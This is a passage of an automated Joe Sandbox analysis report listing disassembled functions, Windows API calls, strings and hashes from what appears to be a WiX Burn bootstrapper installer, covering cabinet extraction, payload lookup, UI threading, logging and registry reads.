CloseHandle.KERNEL32(00000000,?,00F5548E,?,?), ref: 00F6EB6A
CloseHandle.KERNELBASE(?,?,00F5548E,?,?), ref: 00F6EB77

Strings

Failed to create initialization event., xrefs: 00F6EAD5
Failed to create the UI thread., xrefs: 00F6EB3B
uithread.cpp, xrefs: 00F6EACB, 00F6EB31

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: d62d99e1f652c515e5608912a925dd746315694d95cfaa05453aadd4c44fe517
Instruction ID: 657ecd085ad97ccc7287bd4b27764a2cb037856857e1bacd37129812db66be59
Opcode Fuzzy Hash: d62d99e1f652c515e5608912a925dd746315694d95cfaa05453aadd4c44fe517
Instruction Fuzzy Hash: 4C31A877D41119BBDB11DFD99D85A9FBAB8FF04760F11016AF904F7240E7709E00A6A1

Function 00F714E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,76232F60,?,?,00F55405,00F553BD,00000000,00F55445), ref: 00F71506
GetLastError.KERNEL32 ref: 00F71519
GetExitCodeThread.KERNELBASE(00F9B488,?), ref: 00F7155B
GetLastError.KERNEL32 ref: 00F71569
ResetEvent.KERNEL32(00F9B460), ref: 00F715A4
GetLastError.KERNEL32 ref: 00F715AE

Strings

Failed to get extraction thread exit code., xrefs: 00F7159A
cabextract.cpp, xrefs: 00F71540, 00F71590, 00F715D5
Failed to reset operation complete event., xrefs: 00F715DF
Failed to wait for operation complete event., xrefs: 00F7154A

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 668b08f1264b555f72729892902f2423980048b1758248cbbee9250a4a26871b
Instruction ID: 2d0f8290da98db9284f21cd851508d144f0d50db9ca7744b4cb6be2a513d0901
Opcode Fuzzy Hash: 668b08f1264b555f72729892902f2423980048b1758248cbbee9250a4a26871b
Instruction Fuzzy Hash: 323184B1A40205EBDB149F6E9D05ABF7BF8FB44711B10815BF90AD6160E734DA08FB62

Function 00F5CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00F553BD,00000000,00F55489,00F55445,WixBundleUILevel,840F01E8,?,00000001), ref: 00F5CC1C

Strings

payload.cpp, xrefs: 00F5CD1D
Payload was not found in container: %ls, xrefs: 00F5CD29
Failed to find embedded payload: %ls, xrefs: 00F5CC48
Failed to ensure directory exists, xrefs: 00F5CCEE
Failed to extract file., xrefs: 00F5CCE7
Failed to concat file paths., xrefs: 00F5CCFC
Failed to get next stream., xrefs: 00F5CD03
Failed to get directory portion of local file path, xrefs: 00F5CCF5

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 4199a6d205f40b1cce46907aa22b0e578a18a4f7a62b636111a921faa789d0dc
Instruction ID: 88ae1a80747c7e4a2f1c3c8adb03bc2b2b67fdd1a666d4b1437a114cfa636738
Opcode Fuzzy Hash: 4199a6d205f40b1cce46907aa22b0e578a18a4f7a62b636111a921faa789d0dc
Instruction Fuzzy Hash: 3A41B131D00319AFCF259F48CC85A6EBB75AF00722B118169EE16AB251D7749D48FBD1

Function 00F54796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00F547BB
GetCurrentThreadId.KERNEL32 ref: 00F547C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F5484F

Strings

user.cpp, xrefs: 00F5489B
wininet.dll, xrefs: 00F547EE
Failed to create user for UX., xrefs: 00F547DB
Failed to start bootstrapper application., xrefs: 00F5481D
Failed to load UX., xrefs: 00F54804
Unexpected return value from message pump., xrefs: 00F548A5

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 10b9cfb22860a11d7d57862448d78e02b7b28bbc67d7cf1e46c55ca612b84cbc
Instruction ID: a553b26479c8ad856c64d0e5a6cc4a0ef70536215ad9180b234e090bcbb2ad10
Opcode Fuzzy Hash: 10b9cfb22860a11d7d57862448d78e02b7b28bbc67d7cf1e46c55ca612b84cbc
Instruction Fuzzy Hash: EC41C272A00555BFEB14DBA4DC85EBA776CEF0472AF100125FE04E7190DB34AD89A7A1

Function 00F5D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00F547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00F5548E,?), ref: 00F5D6DA
GetLastError.KERNEL32(?,00F547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00F5548E,?,?), ref: 00F5D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00F5D71F
GetLastError.KERNEL32(?,00F547FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00F5548E,?,?), ref: 00F5D72B

Strings

Failed to create UX., xrefs: 00F5D76F
userexperience.cpp, xrefs: 00F5D708, 00F5D74C
BootstrapperApplicationCreate, xrefs: 00F5D719
Failed to load UX DLL., xrefs: 00F5D712
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 00F5D756

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 4fd465df6c3ff59c44495dec9241eeda19b68838f8bec685153cd565db3d96fd
Instruction ID: d0ed3df6b8f41ac02c3c6dd02c3ac6fdd25cba41fb381faca2cfbcb11201f49a
Opcode Fuzzy Hash: 4fd465df6c3ff59c44495dec9241eeda19b68838f8bec685153cd565db3d96fd
Instruction Fuzzy Hash: 5411C837A81736A7DB3157956C05B1B7A54AB08B63F010625FF14EB2D0EB20DC0876D1

Function 00F5F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00F5F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00F5F94F

Strings

Failed to read Resume value., xrefs: 00F5F8D8
Failed to open registration key., xrefs: 00F5F8AB
%ls.RebootRequired, xrefs: 00F5F82F
Resume, xrefs: 00F5F8B6
Failed to format pending restart registry key to read., xrefs: 00F5F846

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: cd05173743da59455fdbafcfb05eea9d0269017a9a48bb35aa6616bb9c94210e
Instruction ID: a0dda7bf6a8de5e0f775261cb165cafe5a352685fa207d6e6179db44f348eb2d
Opcode Fuzzy Hash: cd05173743da59455fdbafcfb05eea9d0269017a9a48bb35aa6616bb9c94210e
Instruction Fuzzy Hash: 0B413A72D40519BFDB119F98CC81BADBBA4FB04322F5541B6EE10AB250C376AE49AB41

Function 00F90523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00FBB5FC,00000000,?,?,?,00F64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00F554FA,?), ref: 00F90533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00FBB5F4,?,00F64207,00000000,Setup), ref: 00F905D7
GetLastError.KERNEL32(?,00F64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00F554FA,?,?,?), ref: 00F905E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00F64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00F554FA,?), ref: 00F90621

Part of subcall function 00F52DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00F52F09

LeaveCriticalSection.KERNEL32(00FBB5FC,?,?,00FBB5F4,?,00F64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00F554FA,?), ref: 00F9067A

Strings

logutil.cpp, xrefs: 00F90606

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: a995f07e258a0a0c90eafdda22ffc95b055e3b8a7ce05333926fa63a310ab6e2
Instruction ID: a7e03016dc30daa6888f723cebf5e35dc609121562fed384af644852e897f487
Opcode Fuzzy Hash: a995f07e258a0a0c90eafdda22ffc95b055e3b8a7ce05333926fa63a310ab6e2
Instruction Fuzzy Hash: 9631B332D0022AEFEF219F659D85EAA7668AB00755F050225FE00A6160DFB5DD60BFA1

Function 00F932F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F93309
SysAllocString.OLEAUT32(?), ref: 00F93325
VariantClear.OLEAUT32(?), ref: 00F933AC
SysFreeString.OLEAUT32(00000000), ref: 00F933B7

Strings

xmlutil.cpp, xrefs: 00F9333C
`Dv, xrefs: 00F933B7

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `Dv$xmlutil.cpp
API String ID: 760788290-2876128059
Opcode ID: fbf191343e030caa45586588697e0e088dd97f84f32c0e2d9220fe72fc1a1f21
Instruction ID: b85b1ddec0a79e8834f9c2e9e4eaccdff2e1ea5e61953d5308d721727e2d9882
Opcode Fuzzy Hash: fbf191343e030caa45586588697e0e088dd97f84f32c0e2d9220fe72fc1a1f21
Instruction Fuzzy Hash: CA219132D40219EFDF11DFA4C948FAEBBB9AF45725F150158F905AB210CF319E00AB90

Function 00F70B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00F70BDE
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F70BFD
GetLastError.KERNEL32 ref: 00F70C07

Strings

Failed to write during cabinet extraction., xrefs: 00F70C35
Unexpected call to CabWrite()., xrefs: 00F70BC1
cabextract.cpp, xrefs: 00F70C2B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 14147f30c8ff28e5b222db681341dcd877d9acc3c8eec4f8ff9a06bf05b87edd
Instruction ID: 21cdddb94ea7b38f6cef75a1eee75ba27a21e96f37209c077eae4cec2120a813
Opcode Fuzzy Hash: 14147f30c8ff28e5b222db681341dcd877d9acc3c8eec4f8ff9a06bf05b87edd
Instruction Fuzzy Hash: 1F21C277500105EBCB15CF5DDD85D5A77A8EF85724B21815AFE08C7251EB31D900EB62

Function 00F90879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,00F553BD,00000000,?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F90897
GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F908A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F908D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F908EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F9092B

Strings

procutil.cpp, xrefs: 00F90919

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: f0792819ab09aa60fc82171421ec11520af7f1b8dd14caa9caec5327ddffbc05
Instruction ID: b33e018885930ed51dfabad5303e345ef4116924f235ff8003d1ae30a71405d5
Opcode Fuzzy Hash: f0792819ab09aa60fc82171421ec11520af7f1b8dd14caa9caec5327ddffbc05
Instruction Fuzzy Hash: 8021A733E40129EFFB219B999905A9EBBB8EF10721F114156AD14E7360D7708E00FAD0

Function 00F70C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F70CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F70CD6
SetFileTime.KERNELBASE(?,?,?,?), ref: 00F70CE9
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00F708B1,?,?), ref: 00F70CF8

Strings

cabextract.cpp, xrefs: 00F70C93
Invalid operation for this state., xrefs: 00F70C9D

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: a486d5e66913b421525433037851d449243da9b01aeecaa3c64eb28fd1be2e13
Instruction ID: ffa759caac07b6f206c3980b6c5169f22547fe19d8e43502de1fdcbc363d280c
Opcode Fuzzy Hash: a486d5e66913b421525433037851d449243da9b01aeecaa3c64eb28fd1be2e13
Instruction Fuzzy Hash: 8321D57280061DEB8B209FA8DD099BABBBCFF047207508217F858D6590EB75E951EB91

Function 00F93565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F93574
InterlockedIncrement.KERNEL32(00FBB6C8), ref: 00F93591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00FBB6B8,?,?,?,?,?,?), ref: 00F935AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,00FBB6B8,?,?,?,?,?,?), ref: 00F935B8

Strings

MSXML.DOMDocument, xrefs: 00F935B3
Msxml2.DOMDocument, xrefs: 00F935A7

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 4b678f9cebe8ec016ef3d22d9e2aaa3e9f951a0382da8dbeb8ac4d96187e981d
Instruction ID: 79c00f7799ef5ad5c28ab031e82b6065c0d3e777b92354aad4402e7fe5d0c31e
Opcode Fuzzy Hash: 4b678f9cebe8ec016ef3d22d9e2aaa3e9f951a0382da8dbeb8ac4d96187e981d
Instruction Fuzzy Hash: B7F0A021B4012A5BEB214BA27E09F563EA6DB88B64F1A056AEC00C2090D7A0C941BEB1

Function 00F94A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00F94A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00F94ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00F94AF6
GetLastError.KERNEL32(00000000,00F9B7A0,?,00000000,?,00000000,?,00000000), ref: 00F94B34
GlobalFree.KERNEL32(00000000), ref: 00F94B65

Strings

fileutil.cpp, xrefs: 00F94AB8, 00F94B11

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 6c36ed0a70e1181e33edda7fdb46ac3639f14102b69cd5eb49bee9268c114d68
Instruction ID: 47924a0d73d5a3e0578d1805f5699c5d1adb26a222202894ffef8b9674632574
Opcode Fuzzy Hash: 6c36ed0a70e1181e33edda7fdb46ac3639f14102b69cd5eb49bee9268c114d68
Instruction Fuzzy Hash: 4831C437D40229ABEF229F998C41FAFBAA8AF94760F114155FD14E7241E734EC01AAD4

Function 00F6E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 00F6E985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00F6E994
SetWindowLongW.USER32(?,000000EB,?), ref: 00F6E9A8
DefWindowProcW.USER32(?,?,?,?), ref: 00F6E9B8
GetWindowLongW.USER32(?,000000EB), ref: 00F6E9D2
PostQuitMessage.USER32(00000000), ref: 00F6EA31

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: a0f46fbbe5f1f90a898d2e1aad74d40ac338811918027be9feb1b09fdd60c72e
Instruction ID: 6c2ad4edace9a840c6f602501b7ae9cb4dffe5497dfa152d345375972e28d3dc
Opcode Fuzzy Hash: a0f46fbbe5f1f90a898d2e1aad74d40ac338811918027be9feb1b09fdd60c72e
Instruction Fuzzy Hash: D521D036104119FFDF119FA8ED09E6A3B65FF44320F144618FA0AAA2A4C731ED10FBA0

Function 00F70A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00F70B27
GetLastError.KERNEL32(?,?,?), ref: 00F70B31

Strings

Invalid seek type., xrefs: 00F70ABD
Failed to move file pointer 0x%x bytes., xrefs: 00F70B62
cabextract.cpp, xrefs: 00F70B55

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: d92dbe4c3b1592dc54d618946c5b287af4f71587bc432348be970aa313860457
Instruction ID: 25f4efd7c38e600c2ae3086254c2ef2e4eaf36fbf0464b7cdec98a343fbd1ab1
Opcode Fuzzy Hash: d92dbe4c3b1592dc54d618946c5b287af4f71587bc432348be970aa313860457
Instruction Fuzzy Hash: 0B31C472A4021AEFDB10DF98DC84E6EB769FF48724B04C116F918D7250DB34EE10AB92

Function 00F54115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00F6A0E8,00000000,00000000,?,00000000,00F553BD,00000000,?,?,00F5D5B5,?), ref: 00F54123
GetLastError.KERNEL32(?,00F6A0E8,00000000,00000000,?,00000000,00F553BD,00000000,?,?,00F5D5B5,?,00000000,00000000), ref: 00F54131
CreateDirectoryW.KERNEL32(?,840F01E8,00F55489,?,00F6A0E8,00000000,00000000,?,00000000,00F553BD,00000000,?,?,00F5D5B5,?,00000000), ref: 00F5419A
GetLastError.KERNEL32(?,00F6A0E8,00000000,00000000,?,00000000,00F553BD,00000000,?,?,00F5D5B5,?,00000000,00000000), ref: 00F541A4

Strings

dirutil.cpp, xrefs: 00F541D4

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

